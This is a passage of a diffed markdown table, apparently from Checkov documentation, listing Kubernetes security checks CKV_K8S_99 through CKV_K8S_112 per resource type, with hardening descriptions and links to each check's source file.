[ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py) | +| 3241 | CKV_K8S_99 | resource | Job | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate | Kubernetes | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py) | +| 3242 | CKV_K8S_99 | resource | Pod | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate | Kubernetes | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py) | +| 3243 | CKV_K8S_99 | resource | PodTemplate | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate | Kubernetes | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py) | +| 3244 | CKV_K8S_99 | resource | ReplicaSet | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate | Kubernetes | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py) | +| 3245 | CKV_K8S_99 | resource | ReplicationController | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate | Kubernetes | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py) | +| 3246 | CKV_K8S_99 | resource | StatefulSet | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate | Kubernetes | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py) | +| 3247 | CKV_K8S_100 | resource | CronJob | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py) | +| 3248 | CKV_K8S_100 | resource | DaemonSet | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py) | +| 3249 | CKV_K8S_100 | resource | Deployment | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py) | +| 3250 | CKV_K8S_100 | resource | DeploymentConfig | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py) | +| 3251 | CKV_K8S_100 | resource | Job | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py) | +| 3252 | CKV_K8S_100 | resource | Pod | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py) | +| 3253 | CKV_K8S_100 | resource | PodTemplate | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py) | +| 3254 | CKV_K8S_100 | resource | ReplicaSet | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py) | +| 3255 | CKV_K8S_100 | resource | ReplicationController | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py) | +| 3256 | CKV_K8S_100 | resource | StatefulSet | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py) | +| 3257 | CKV_K8S_102 | resource | CronJob | Ensure that the --etcd-cafile argument is set as appropriate | Kubernetes | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py) | +| 3258 | CKV_K8S_102 | resource | DaemonSet | Ensure that the --etcd-cafile argument is set as appropriate | Kubernetes | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py) | +| 3259 | CKV_K8S_102 | resource | Deployment | Ensure that the --etcd-cafile argument is set as appropriate | Kubernetes | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py) | +| 3260 | CKV_K8S_102 | resource | DeploymentConfig | Ensure that the --etcd-cafile argument is set as appropriate | Kubernetes | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py) | +| 3261 | CKV_K8S_102 | resource | Job | Ensure that the --etcd-cafile argument is set as appropriate | Kubernetes | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py) | +| 3262 | CKV_K8S_102 | resource | Pod | Ensure that the --etcd-cafile argument is set as appropriate | Kubernetes | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py) | +| 3263 | CKV_K8S_102 | resource | PodTemplate | Ensure that the --etcd-cafile argument is set as appropriate | Kubernetes | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py) | +| 3264 | CKV_K8S_102 | resource | ReplicaSet | Ensure that the --etcd-cafile argument is set as appropriate | Kubernetes | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py) | +| 3265 | CKV_K8S_102 | resource | ReplicationController | Ensure that the --etcd-cafile argument is set as appropriate | Kubernetes | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py) | +| 3266 | CKV_K8S_102 | resource | StatefulSet | Ensure that the --etcd-cafile argument is set as appropriate | Kubernetes | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py) | +| 3267 | CKV_K8S_104 | resource | CronJob | Ensure that encryption providers are appropriately configured | Kubernetes | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py) | +| 3268 | CKV_K8S_104 | resource | DaemonSet | Ensure that encryption providers are appropriately configured | Kubernetes | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py) | +| 3269 | CKV_K8S_104 | resource | Deployment | Ensure that encryption providers are appropriately configured | Kubernetes | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py) | +| 3270 | CKV_K8S_104 | resource | DeploymentConfig | Ensure that encryption providers are appropriately configured | Kubernetes | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py) | +| 3271 | CKV_K8S_104 | resource | Job | Ensure that encryption providers are appropriately configured | Kubernetes | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py) | +| 3272 | CKV_K8S_104 | resource | Pod | Ensure that encryption providers are appropriately configured | Kubernetes | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py) | +| 3273 | CKV_K8S_104 | resource | PodTemplate | Ensure that encryption providers are appropriately configured | Kubernetes | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py) | +| 3274 | CKV_K8S_104 | resource | ReplicaSet | Ensure that encryption providers are appropriately configured | Kubernetes | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py) | +| 3275 | CKV_K8S_104 | resource | ReplicationController | Ensure that encryption providers are appropriately configured | Kubernetes | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py) | +| 3276 | CKV_K8S_104 | resource | StatefulSet | Ensure that encryption providers are appropriately configured | Kubernetes | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py) | +| 3277 | CKV_K8S_105 | resource | CronJob | Ensure that the API Server only makes use of Strong Cryptographic Ciphers | Kubernetes | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py) | +| 3278 | CKV_K8S_105 | resource | DaemonSet | Ensure that the API Server only makes use of Strong Cryptographic Ciphers | Kubernetes | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py) | +| 3279 | CKV_K8S_105 | resource | Deployment | Ensure that the API Server only makes use of Strong Cryptographic Ciphers | Kubernetes | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py) | +| 3280 | CKV_K8S_105 | resource | DeploymentConfig | Ensure that the API Server only makes use of Strong Cryptographic Ciphers | Kubernetes | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py) | +| 3281 | CKV_K8S_105 | resource | Job | Ensure that the API Server only makes use of Strong Cryptographic Ciphers | Kubernetes | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py) | +| 3282 | CKV_K8S_105 | resource | Pod | Ensure that the API Server only makes use of Strong Cryptographic Ciphers | Kubernetes | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py) | +| 3283 | CKV_K8S_105 | resource | PodTemplate | Ensure that the API Server only makes use of Strong Cryptographic Ciphers | Kubernetes | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py) | +| 3284 | CKV_K8S_105 | resource | ReplicaSet | Ensure that the API Server only makes use of Strong Cryptographic Ciphers | Kubernetes | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py) | +| 3285 | CKV_K8S_105 | resource | ReplicationController | Ensure that the API Server only makes use of Strong Cryptographic Ciphers | Kubernetes | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py) | +| 3286 | CKV_K8S_105 | resource | StatefulSet | Ensure that the API Server only makes use of Strong Cryptographic Ciphers | Kubernetes | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py) | +| 3287 | CKV_K8S_106 | resource | CronJob | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate | Kubernetes | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py) | +| 3288 | CKV_K8S_106 | resource | DaemonSet | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate | Kubernetes | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py) | +| 3289 | CKV_K8S_106 | resource | Deployment | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate | Kubernetes | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py) | +| 3290 | CKV_K8S_106 | resource | DeploymentConfig | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate | Kubernetes | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py) | +| 3291 | CKV_K8S_106 | resource | Job | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate | Kubernetes | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py) | +| 3292 | CKV_K8S_106 | resource | Pod | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate | Kubernetes | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py) | +| 3293 | CKV_K8S_106 | resource | PodTemplate | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate | Kubernetes | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py) | +| 3294 | CKV_K8S_106 | resource | ReplicaSet | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate | Kubernetes | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py) | +| 3295 | CKV_K8S_106 | resource | ReplicationController | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate | Kubernetes | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py) | +| 3296 | CKV_K8S_106 | resource | StatefulSet | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate | Kubernetes | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py) | +| 3297 | CKV_K8S_107 | resource | CronJob | Ensure that the --profiling argument is set to false | Kubernetes | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py) | +| 3298 | CKV_K8S_107 | resource | DaemonSet | Ensure that the --profiling argument is set to false | Kubernetes | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py) | +| 3299 | CKV_K8S_107 | resource | Deployment | Ensure that the --profiling argument is set to false | Kubernetes | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py) | +| 3300 | CKV_K8S_107 | resource | DeploymentConfig | Ensure that the --profiling argument is set to false | Kubernetes | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py) | +| 3301 | CKV_K8S_107 | resource | Job | Ensure that the --profiling argument is set to false | Kubernetes | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py) | +| 3302 | CKV_K8S_107 | resource | Pod | Ensure that the --profiling argument is set to false | Kubernetes | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py) | +| 3303 | CKV_K8S_107 | resource | PodTemplate | Ensure that the --profiling argument is set to false | Kubernetes | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py) | +| 3304 | CKV_K8S_107 | resource | ReplicaSet | Ensure that the --profiling argument is set to false | Kubernetes | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py) | +| 3305 | CKV_K8S_107 | resource | ReplicationController | Ensure that the --profiling argument is set to false | Kubernetes | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py) | +| 3306 | CKV_K8S_107 | resource | StatefulSet | Ensure that the --profiling argument is set to false | Kubernetes | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py) | +| 3307 | CKV_K8S_108 | resource | CronJob | Ensure that the --use-service-account-credentials argument is set to true | Kubernetes | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py) | +| 3308 | CKV_K8S_108 | resource | DaemonSet | Ensure that the --use-service-account-credentials argument is set to true | Kubernetes | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py) | +| 3309 | CKV_K8S_108 | resource | Deployment | Ensure that the --use-service-account-credentials argument is set to true | Kubernetes | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py) | +| 3310 | CKV_K8S_108 | resource | DeploymentConfig | Ensure that the --use-service-account-credentials argument is set to true | Kubernetes | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py) | +| 3311 | CKV_K8S_108 | resource | Job | Ensure that the --use-service-account-credentials argument is set to true | Kubernetes | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py) | +| 3312 | CKV_K8S_108 | resource | Pod | Ensure that the --use-service-account-credentials argument is set to true | Kubernetes | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py) | +| 3313 | CKV_K8S_108 | resource | PodTemplate | Ensure that the --use-service-account-credentials argument is set to true | Kubernetes | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py) | +| 3314 | CKV_K8S_108 | resource | ReplicaSet | Ensure that the --use-service-account-credentials argument is set to true | Kubernetes | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py) | +| 3315 | CKV_K8S_108 | resource | ReplicationController | Ensure that the --use-service-account-credentials argument is set to true | Kubernetes | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py) | +| 3316 | CKV_K8S_108 | resource | StatefulSet | Ensure that the --use-service-account-credentials argument is set to true | Kubernetes | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py) | +| 3317 | CKV_K8S_110 | resource | CronJob | Ensure that the --service-account-private-key-file argument is set as appropriate | Kubernetes | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py) | +| 3318 | CKV_K8S_110 | resource | DaemonSet | Ensure that the --service-account-private-key-file argument is set as appropriate | Kubernetes | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py) | +| 3319 | CKV_K8S_110 | resource | Deployment | Ensure that the --service-account-private-key-file argument is set as appropriate | Kubernetes | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py) | +| 3320 | CKV_K8S_110 | resource | DeploymentConfig | Ensure that the --service-account-private-key-file argument is set as appropriate | Kubernetes | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py) | +| 3321 | CKV_K8S_110 | resource | Job | Ensure that the --service-account-private-key-file argument is set as appropriate | Kubernetes | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py) | +| 3322 | CKV_K8S_110 | resource | Pod | Ensure that the --service-account-private-key-file argument is set as appropriate | Kubernetes | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py) | +| 3323 | CKV_K8S_110 | resource | PodTemplate | Ensure that the --service-account-private-key-file argument is set as appropriate | Kubernetes | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py) | +| 3324 | CKV_K8S_110 | resource | ReplicaSet | Ensure that the --service-account-private-key-file argument is set as appropriate | Kubernetes | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py) | +| 3325 | CKV_K8S_110 | resource | ReplicationController | Ensure that the --service-account-private-key-file argument is set as appropriate | Kubernetes | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py) | +| 3326 | CKV_K8S_110 | resource | StatefulSet | Ensure that the --service-account-private-key-file argument is set as appropriate | Kubernetes | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py) | +| 3327 | CKV_K8S_111 | resource | CronJob | Ensure that the --root-ca-file argument is set as appropriate | Kubernetes | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py) | +| 3328 | CKV_K8S_111 | resource | DaemonSet | Ensure that the --root-ca-file argument is set as appropriate | Kubernetes | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py) | +| 3329 | CKV_K8S_111 | resource | Deployment | Ensure that the --root-ca-file argument is set as appropriate | Kubernetes | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py) | +| 3330 | CKV_K8S_111 | resource | DeploymentConfig | Ensure that the --root-ca-file argument is set as appropriate | Kubernetes | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py) | +| 3331 | CKV_K8S_111 | resource | Job | Ensure that the --root-ca-file argument is set as appropriate | Kubernetes | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py) | +| 3332 | CKV_K8S_111 | resource | Pod | Ensure that the --root-ca-file argument is set as appropriate | Kubernetes | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py) | +| 3333 | CKV_K8S_111 | resource | PodTemplate | Ensure that the --root-ca-file argument is set as appropriate | Kubernetes | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py) | +| 3334 | CKV_K8S_111 | resource | ReplicaSet | Ensure that the --root-ca-file argument is set as appropriate | Kubernetes | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py) | +| 3335 | CKV_K8S_111 | resource | ReplicationController | Ensure that the --root-ca-file argument is set as appropriate | Kubernetes | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py) | +| 3336 | CKV_K8S_111 | resource | StatefulSet | Ensure that the --root-ca-file argument is set as appropriate | Kubernetes | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py) | +| 3337 | CKV_K8S_112 | resource | CronJob | Ensure that the RotateKubeletServerCertificate argument is set to true | Kubernetes | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py) | +| 3338 | CKV_K8S_112 | resource | DaemonSet | Ensure that the RotateKubeletServerCertificate argument is set to true | Kubernetes | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py) | +| 3339 | CKV_K8S_112 | resource | Deployment | Ensure that the RotateKubeletServerCertificate argument is set to true | Kubernetes | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py) | +| 3340 | CKV_K8S_112 | resource | DeploymentConfig | Ensure that the RotateKubeletServerCertificate argument is set to true | Kubernetes | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py) | +| 3341 | CKV_K8S_112 | resource | Job | Ensure that the RotateKubeletServerCertificate argument is set to true | Kubernetes | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py) | +| 3342 | CKV_K8S_112 | resource | Pod | Ensure that the RotateKubeletServerCertificate argument is set to true | Kubernetes | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py) | +| 3343 | CKV_K8S_112 | resource | PodTemplate | Ensure that the RotateKubeletServerCertificate argument is set to true | Kubernetes | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py) | +| 3344 | CKV_K8S_112 | resource | ReplicaSet | Ensure that the RotateKubeletServerCertificate argument is set to true | Kubernetes | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py) | +| 3345 | CKV_K8S_112 | resource | ReplicationController | Ensure that the RotateKubeletServerCertificate argument is set to true | Kubernetes | 